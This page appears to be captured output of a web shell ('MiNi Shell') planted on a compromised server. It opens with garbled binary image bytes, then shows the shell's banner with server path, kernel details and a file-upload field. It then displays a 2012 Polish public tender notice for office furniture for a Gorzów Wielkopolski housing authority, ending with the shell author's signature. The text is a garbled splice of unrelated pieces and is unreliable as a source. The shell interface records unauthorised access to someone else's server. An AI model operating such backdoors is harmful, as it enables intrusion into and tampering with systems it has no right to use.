JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120515/106857-N-2012.html

<p class="kh_header"><b>Gorzów Wielkopolski: Dostawa mebli biurowych do pomieszczeń siedziby Zakładu Gospodarki Mieszkaniowej i  Administracji Domów Mieszkalnych nr  1/Oddział  ZGM 
w Gorzowie Wlkp.</b><br>
<b>Numer ogłoszenia: 106857 - 2012; data zamieszczenia: 15.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej , ul. Wełniany Rynek 3, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7387101 (-02), faks 095 7387100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgm.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli biurowych do pomieszczeń siedziby Zakładu Gospodarki Mieszkaniowej i  Administracji Domów Mieszkalnych nr  1/Oddział  ZGM 
w Gorzowie Wlkp..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach realizacji zamówienia  Wykonawca zobowiązany jest do dostawy, rozładunku, wniesienia oraz kompletnego montażu i ustawienia mebli w miejscach wskazanych przez zamawiającego (w tym wypionowania oraz mocowania do ścian), a także wystawienie zużytych (starych) mebli na korytarz względnie przez budynek.
Wykonawca dostarczy przedmiot zamówienia na własny koszt i ryzyko, własnym środkiem transportu do siedziby ZGM i ADM 1 .Wykonawca udzieli Zamawiającemu 36-miesięcznej  gwarancji na  przedmiot zamówienia.

Przedmiotem zamówienia jest  dostawa mebli biurowych do pomieszczeń siedziby Zakładu Gospodarki Mieszkaniowej i  Administracji Domów Mieszkalnych nr 1/Oddział  ZGM w Gorzowie Wlkp., zgodnie z zapisami pkt. 3.2 siwz.

Przedmiot zamówienia obejmuje dostawę wyspecyfikowanych poniżej mebli biurowych do siedziby jednostki, tj:
Administracji Domów Mieszkalnych nr 1
             Oddziału Zakładu Gospodarki Mieszkaniowej 
             ul. Wyszyńskiego 38 , 66-400 Gorzów Wlkp.
             NIP 599-011-28-92
PARTER	 	 
Aneks Kuchenny	 	 
L.P	Nazwa produktu	Wymiary: (szer. x głęb. x wys.)	szt.
1	zestaw mebli kuchennych, szafki dolne i górne, szuflady,listwy 	1
	listwy przyścienne (meble na parter i poddasze)	
2	Manh. C - biurko proste niereg.	800 / 600 / H735	1
3	krzesło konferencyjne siedzisko i oparcie plastik, stelaż metalik	2
Pom.Biurowe nr 2	 	 
L.P	Nazwa produktu	Wymiary: (szer. x głęb. x wys.)	szt.
4	Manh. A - biurko proste płycina	1600 / 800 / H735	1
5	Przepust kablowy plastikowy	fi60+11 / H25	1
6	Szuflada pod klawiaturę	560 / 275 / H36	1
7	OH - kontener z uchwytami	416 / 574 / H607	1
8	OH - szafa aktowa	798 / 440 / H1838	3
9	OH - szafa ubraniowo-akt.	798 / 440 / H1838	1
10	OH - szafa nadstawna	798 / 440 / H729	4
11	krzesło obrotowe, mechanizm synchro, podł. Nieregul tap.I grupa	2
Pom.Biurowe nr 4	 	 
L.P	Nazwa produktu	Wymiary: (szer. x głęb. x wys.)	szt.
12	Manh. A - biurko proste płycina	1600 / 800 / H735	2
13	Przepust kablowy plastikowy	fi60+11 / H25	2
14	Szuflada pod klawiaturę	560 / 275 / H36	2
15	OH - kontener z uchwytami	416 / 574 / H607	2
16	OH - szafa aktowa	798 / 440 / H1838	4
17	OH - szafa ubraniowo-akt.	798 / 440 / H1838	1
18	OH - szafa nadstawna	798 / 440 / H729	5
19	krzesło obrotowe, mechanizm synchro, podł. Nieregul tap.I grupa	3
Pom.Biurowe nr 6	 	 
L.P	Nazwa produktu	Wymiary: (szer. x głęb. x wys.)	szt.
20	Manh. A - biurko proste płycina	1600 / 800 / H735	2
21	Przepust kablowy plastikowy	fi60+11 / H25	2
22	Szuflada pod klawiaturę	560 / 275 / H36	2
23	OH - kontener z uchwytami	416 / 574 / H607	2
24	OH - szafa aktowa	798 / 440 / H1838	6
25	OH - szafa ubraniowo-akt.	798 / 440 / H1838	1
26	OH - szafa nadstawna	798 / 440 / H729	7
27	krzesło obrotowe, mechanizm synchro, podł. Nieregul tap.I grupa	2
Pom.Biurowe nr 7	 	 
L.P	Nazwa produktu	Wymiary: (szer. x głęb. x wys.)	szt.
28	Manh. A - biurko proste płycina	1600 / 800 / H735	2
29	Przepust kablowy plastikowy	fi60+11 / H25	2
30	Szuflada pod klawiaturę	560 / 275 / H36	2
31	OH - kontener z uchwytami	416 / 574 / H607	2
32	OH - szafa aktowa	798 / 440 / H1838	6
33	OH - szafa ubraniowo-akt.	798 / 440 / H1838	1
34	OH - szafa nadstawna	798 / 440 / H729	7
35	Manh. C - biurko proste niereg.	800 / 600 / H735	1
36	krzesło konferencyjne, stelaż metalik, maskownica czarna, tap.I grupa	2
37	krzesło obrotowe, mechanizm synchro, podł. Nieregul tap.I grupa	2
I PIĘTRO	 	 
Pom.Biurowe nr 10	 	 
L.P	Nazwa produktu	Wymiary: (szer. x głęb. x wys.)	szt.
38	biurko proste gabinetowe	1900 / 900 / 740	1
39	Przepust kablowy plastikowy	fi60+11 / H25	1
40	Szuflada pod klawiaturę	560 / 275 / H36	1
41	dostawka do biurka	1000 / 550 / 740	1
42	kontener 3 szufladowy	434 / 520 / 580	1
43	szafa aktowo-ubraniowa	802 / 432 / 1833	1
44	szafa aktowa zamykana	802 / 432 / 1833	1
45	wieniec górny	1608 / 432 / 38	1
46	szafa aktowa zamykana	802 / 432 / 1129	2
47	wieniec górny	1608 / 432 / 38	1
48	stół konferencyjny	1900 / 900 / 740	1
49	krzesło konferencyjne, stelaż metalik, podł. Z nakładką PP, tap.I grupa	4
50	krzesło obrotowe, mechanizm synchro, podł.Regu. tap.I grupa	1
Pom.Biurowe nr 11	 	 
L.P	Nazwa produktu	Wymiary: (szer. x głęb. x wys.)	szt.
51	biurko proste gabinetowe	1900 / 900 / 740	1
52	Przepust kablowy plastikowy	fi60+11 / H25	1
53	Szuflada pod klawiaturę	560 / 275 / H36	1
54	dostawka do biurka	1000 / 550 / 740	1
55	kontener 3 szufladowy	434 / 520 / 580	1
56	szafa aktowa zamykana	802 / 432 / 1129	2
57	regał otwarty	802 / 432 / 1129	1
58	klp.drzwi szklanych z ramką Alu	800 / 20 / 1050 szkło mleczne	1
59	wieniec górny	2410 / 432 / 38	1
60	szafa aktowo-ubraniowa	802 / 432 / 1833	1
61	szafa aktowa zamykana	802 / 432 / 1833	1
62	wieniec górny	1608 / 432 / 38	1
63	stół konferencyjny	1900 / 900 / 740	1
64	krzesło konferencyjne, stelaż metalik, podł. Z nakładką PP, tap.I grupa	6
65	krzesło obrotowe, mechanizm synchro, podł.Regu. tap.I grupa	1
Pom.Biurowe nr 12	 	 
L.P	Nazwa produktu	Wymiary: (szer. x głęb. x wys.)	szt.
66	Manh. A - biurko proste płycina	1600 / 800 / H735	2
67	Przepust kablowy plastikowy	fi60+11 / H25	2
68	Szuflada pod klawiaturę	560 / 275 / H36	2
69	OH - kontener z uchwytami	416 / 574 / H607	2
70	OH - szafa aktowa	798 / 440 / H1838	6
71	OH - szafa ubraniowo-akt.	798 / 440 / H1838	1
72	OH - szafa nadstawna	798 / 440 / H729	7
73	krzesło obrotowe, mechanizm synchro, podł. Nieregul tap.I grupa	2
Pom.Biurowe nr 14	 	 
L.P	Nazwa produktu	Wymiary: (szer. x głęb. x wys.)	szt.
74	Manh. A - biurko łączone płycina	1600 / 1000 / H735	1
75	Manh. A - biurko łączone płycina	1600 / 1000 / H735	2
76	Noga okrągła - fi70 niereg.	fi70 / H710	3
77	Przepust kablowy plastikowy	fi60+11 / H25	3
78	Szuflada pod klawiaturę	560 / 275 / H36	3
79	OH - kontener z uchwytami	416 / 600 / H735	3
80	OH - szafa aktowa	798 / 440 / H1838	11
81	OH - szafa ubraniowo-akt.	798 / 440 / H1838	1
82	OH - szafa nadstawna	798 / 440 / H729	12
83	krzesło obrotowe, mechanizm synchro, podł. Nieregul tap.I grupa	3
Pom.Biurowe nr 15	 	 
L.P	Nazwa produktu	Wymiary: (szer. x głęb. x wys.)	szt.
84	biurko proste gabinetowe	1900 / 900 / 740	1
85	Przepust kablowy plastikowy	fi60+11 / H25	1
86	Szuflada pod klawiaturę	560 / 275 / H36	1
87	dostawka do biurka	1000 / 550 / 740	1
88	kontener 3 szufladowy	434 / 520 / 580	1
89	szafa aktowo-ubraniowa	802 / 432 / 1833	1
90	szafa aktowa zamykana	802 / 432 / 1833	1
91	wieniec górny	1608 / 432 / 38	1
92	stół 	fi 800 H740	1
93	krzesło konferencyjne, stelaż metalik, podł. Z nakładką PP, tap.I grupa	3
94	krzesło obrotowe, mechanizm synchro, podł.Regu. tap.I grupa	1
95	OH - regał aktowy otwarty	798 / 440 / H2190	5
96	OH - szafa aktowa	598 / 440 / H782	1
     Archiwum	 	 	 
97	 regał aktowy otwarty 	2000/900/400	10
	
Zakład Gospodarki Mieszkaniowej
       ul. Wełniany Rynek 3, 66-400 Gorzów Wlkp.
       NIP 599-011-28-92, pokój 15
Zakład Gospodarki Mieszkaniowej	 	 
L.P	Nazwa produktu	Wymiary: (szer. x głęb. x wys.)	szt.
1	biurko proste 	1600 / 600 / H750	3
2	Przepust kablowy plastikowy	fi60+11 / H25	3
3	Szuflada pod klawiaturę	560 / 275 / H36	3
4	Kontener z 1 szufladą i drzwiczkami (w środku półka	600 / 600 / H700	3
	
Szczegółową charakterystykę mebli określa specyfikacja techniczna zawierająca wymogi wykończeniowe, stanowiąca załącznik nr 1 do umowy.

Opis części zamówienia
1. Przedmiot zamówienia stanowi jedno zadanie, wobec czego Zamawiający nie przewiduje możliwości składania ofert częściowych.
2. Wykonawca, zgodnie z regulacją art. 36 ust. 5 u Pzp, może powierzyć wykonanie zamówienia podwykonawcom wykazującym brak podstaw do wykluczenia z powodu  niespełnienia warunków, o których  mowa  art. 24 ust. 1  i 2 pkt. 1 u Pzp , oraz spełniającym warunki jakie zamawiający stawia Wykonawcy  w pkt. 7 siwz,. W takim przypadku wykonawca zobowiązany jest do wskazania w swojej ofercie części zamówienia  (zakresu), których wykonanie zamierza powierzyć podwykonawcom.
3.Wszelkich rozliczeń wykonawcy dokonują między sobą. Zamawiający będzie się rozliczać wyłącznie z wykonawcą wyłonionym w drodze niniejszego postępowania.
4.Zamawiający zastrzega, iż na realizację przedmiotu zamówienia zostanie spisana umowa z ZGM.
5. Przed podpisaniem umowy Wykonawca dostarczy Zamawiającemu, kopię polisy OC w zakresie prowadzonej działalności. Wykonawca obowiązany jest przedłożyć zamawiającemu kopię aktualnej polisy każdorazowo w przypadku wygaśnięcia ubezpieczenia.
6. Po podpisaniu umowy, wszelkie sprawy wynikające w trakcie jej realizacji prowadzone są przez ZGM i ADM    nr 1 i tam też winny być kierowane..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.12.11.00-7, 39.12.12.00-8, 39.14.12.00-4, 39.13.41.00-1, 39.13.21.00-7, 39.14.13.00-5, 39.14.11.00-3, 39.11.20.00-0, 39.14.13.00-5, 39.25.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania niniejszego przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykonanie w okresie ostatnich 3 lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) przed upływem terminu składanie ofert przynajmniej dwóch dostaw w zakresie objętym przedmiotem zamówienia, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że dostawy zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie warunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie warunków.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony i podpisany formularz oferty /zał. nr 1/ wraz z formularzem cenowym/zał. nr 1A i 1B/ oraz oświadczeniem, o :
-zdolności do wykonania zamówienia na podstawie art. 22 ust. 1 u Pzp, tym samym spełnieniu warunków określonych w siwz, 
-braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa  w art. 24 ust. 1 oraz art. 24 ust.2 pkt 1 u Pzp,
oraz o:
-zapoznaniu się z treścią załączonego wzoru umowy i jej akceptacji bez zastrzeżeń oraz zobowiązania się w przypadku wyboru, do jej zawarcia w miejscu i terminie wyznaczonym przez zamawiającego, 
2) oryginał pełnomocnictwa osoby/osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie wynikają z przepisów prawa lub innych dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość  zmian postanowień umowy  w sytuacji zmiany istotnej t.j. 
a) zmiany osoby wymienionej w § 2 umowy.
b) zmniejszenia ilościowego asortymentu dostawy
c) odstąpienia Wykonawcy od realizacji dostawy objętej przedmiotem zamówienia, Zamawiający może zlecić wykonanie zamówienia innemu wykonawcy, kosztami obciążając Wykonawcę realizującego zamówienie podstawowe
d) dostawy zamiennego asortymentu nie powodującego zmiany stawki jednostkowej, tym samym  zwiększenia ceny oferty
e) terminu realizacji umowy w przypadku, kiedy Zamawiający przed upływem terminu realizacji, potwierdzi bądź przesunie termin dostawy o czas potrzebny na dokończenie prac w pomieszczeniach, do których skierowana będzie dostawa.
2.Dopuszczalne  będą zmiany nieistotne, uznane za tożsame, tzn. takie, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynie na krąg podmiotów ubiegających się o to zamówienie lub wynik postępowania.( np. zmiana ustawowej stawki podatku VAT)
3.Modyfikacje i uzupełnienia  w treści niniejszej umowy będą  dokonywane wyłącznie w formie pisemnego aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgm.bip.gorzow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Mieszkaniowej
ul. Wełniany Rynek 3
66-400 Gorzów Wlkp.
pok.19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2012 godzina 08:00, miejsce: siedziba zamawiającego(sekretariat), pok.12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com